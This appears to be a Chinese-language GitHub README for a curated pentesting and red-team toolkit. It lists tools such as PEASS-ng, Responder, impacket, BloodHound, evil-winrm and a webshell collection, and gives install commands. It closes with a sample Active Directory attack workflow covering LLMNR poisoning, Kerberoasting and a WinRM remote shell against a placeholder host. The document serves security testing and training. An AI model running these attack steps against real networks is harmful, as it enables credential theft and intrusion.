NyetNighy/pentesting-toolkit

# 🎯 渗透测试工具包 精选的渗透测试和红队工具集合 —— 涵盖侦察、漏洞利用、权限提升、后渗透、横向移动和 Active Directory 攻击。 ## 📂 包含内容 ### 🔍 侦察与扫描 | 工具 | 描述 | |------|-------------| | `nmapAutomator/` | 全自动网络/侦察扫描器 — 运行 nmap + 漏洞扫描 | | `nmap-vulners/` | 通过 Vulners API 进行漏洞检测的 Nmap 脚本 | | `testssl.sh/` | 检查任何 SSL/TLS 配置的弱点 | ### 📋 权限提升 — Linux | 工具 | 描述 | |------|-------------| | `PEASS-ng/` | 最新的权限提升脚本 (LinPEAS, WinPEAS 等) | | `LinEnum/` | 经典的 Linux 权限提升枚举工具 | | `linux-exploit-suggester/` | 根据 kernel 版本建议 Linux 漏洞利用 | | `linux-smart-enumeration/` | 智能 Linux 权限提升枚举 | | `lynis/` | Linux 安全审计和系统加固检查器 | ### 📋 权限提升 — Windows | 工具 | 描述 | |------|-------------| | `Windows-Exploit-Suggester/` | 根据补丁级别建议 Windows 漏洞利用 | | `wesng/` | Windows 漏洞利用建议器 — 下一代 | ### 📋 权限提升 — 通用 | 工具 | 描述 | |------|-------------| | `PrivEsc/` | 权限提升资源和漏洞利用集合 | ### 🌐 网络攻击 | 工具 | 描述 | |------|-------------| | `Responder/` | LLMNR、NBT-NS 和 MDNS 欺骗器 (NetBIOS 名称服务) | ### 💀 后渗透 / Shells | 工具 | 描述 | |------|-------------| | `webshell/` | Web Shell 集合 — PHP, ASP, JSP 等 | ### 🔐 凭据攻击 | 工具 | 描述 | |------|-------------| | `BloodHound/` | Active Directory 侦察和图分析 | | `evil-winrm/` | 用于后渗透的 WinRM 远程 Shell | | `impacket/` | 用于低级网络协议攻击的 Python 库 | ## 🏷️ 标签 `#pentest` `#privilege-escalation` `#red-team` `#exploit` `#oscp` `#active-directory` `#security` ## ⚡ 快速安装 (Kali/Debian) ``` # Clone 所有 submodules git clone --recurse-submodules https://github.com/NyetNighy/pentesting-toolkit.git # 安装 core dependencies sudo apt update && sudo apt install -y \ python3 python3-pip ruby nmap masscan \ responder impacket evil-winrm \ bloodhound neo4j # PEASS-ng 设置 cd pentesting-toolkit/PEASS-ng chmod +x linpeas.sh winpeas.sh # Responder 设置 cd ../Responder chmod +x Responder.py # linux-smart-enumeration cd ../linux-smart-enumeration chmod +x lse.sh # nmapAutomator cd ../nmapAutomator chmod +x nmapAutomator.sh ``` ## 📋 各工具要求 | 工具 | 语言 | 主要依赖 | |------|----------|-------------------| | PEASS-ng | Shell | curl, wget, basic unix utils | | LinEnum | Bash | standard Linux utils | | linux-exploit-suggester | Bash/Perl | uname, kernel info | | linux-smart-enumeration | Bash | standard Linux utils | | lynis | Shell | nroff, awk, cat | | Windows-Exploit-Suggester | Python | xlrd | | wesng | Python | pip install wesng | | Responder | Python | ctypes, socket | | impacket | Python | pip install impacket | | BloodHound | Python/JS | neo4j, adcs | | evil-winrm | Ruby | winrm, highline | | webshell | PHP/ASP/JSP | web server | | nmapAutomator | Bash | nmap, gobuster, ffuf | | testssl.sh | Shell/Bash | openssl, nmap | ## 🛠️ Kali Metapackages (推荐) ``` # Full pentest 环境 sudo apt install -y \ exploitdb binaries dirmap seclists \ responder impacket-tools evil-winrm \ bloodhound nmap masscan \ python3 python3-pip ruby # OSCP 风格 sudo apt install -y \ openvas nikto dirb gobuster \ hydra medusa hashcat \ seclists exploitdb ``` ## 🔴 Active Directory 攻击工作流 ``` # 1. Responder 用于 LLMNR/NBT-NS poisoning cd Responder && sudo python3 Responder.py -I eth0 # 2. Impacket 用于 Kerberoasting / Pass-the-Hash python3 GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN/user # 3. BloodHound ingestor cd BloodHound && python3 bloodhound.py -c All -u user -p pass # 4. evil-winrm shell ruby evil-winrm.rb -i 10.10.10.10 -u user -p password ``` *由 Ori 维护 — 欢迎贡献 🌀*

标签：AD域安全, AD攻击面, BloodHound, CTF学习, CTF工具, CTI, Cutter, Impacket, Linux提权, Mr. Robot, Nmap, SSL/TLS安全检测, TGT, Webshell, Web报告查看器, Windows提权, XXE攻击, 云存储安全, 企业安全, 内网渗透, 凭证攻击, 协议分析, 安全工具集, 安全测试工具, 密码管理, 应用安全, 开源安全工具, 插件系统, 攻击路径可视化, 攻防演练, 数据展示, 权限提升, 横向移动, 活动目录攻击, 漏洞搜索, 系统加固, 红队, 编程规范, 网络协议攻击, 网络安全, 网络扫描, 网络资产管理, 虚拟驱动器, 逆向工具, 逆向工程平台, 隐私保护, 黑客工具